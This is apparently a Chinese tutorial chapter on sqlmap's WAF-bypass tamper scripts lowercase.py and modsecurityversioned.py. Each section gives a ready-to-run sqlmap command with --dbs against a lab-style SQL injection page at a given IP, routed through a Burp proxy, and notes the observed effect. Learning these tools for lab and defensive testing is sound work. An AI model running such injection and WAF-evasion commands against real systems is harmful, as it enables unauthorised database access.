sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

24. lowercase.py脚本

将攻击的payload从大写转换为小写，适用于所有的数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="lowercase.py" --proxy="http://127.0.0.1:8080" -batch

发现是可以注入的，burp抓包情况如下：

sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

都变成小写了

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

25. modsecurityversioned.py脚本

使用注释的方式围住完整的查询条件，主要是用于绕过ModSecuriy这个开源的WAF，适用于Mysql数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="modsecurityversioned.py" --proxy="http://127.0.0.1:8080" -batch

sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

burp抓包没看到效果，用的比较少

sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

sqlmap从入门到精通-第七章-7-12 绕过WAF脚本-lowercase.py&modsecurityversioned.py

相关推荐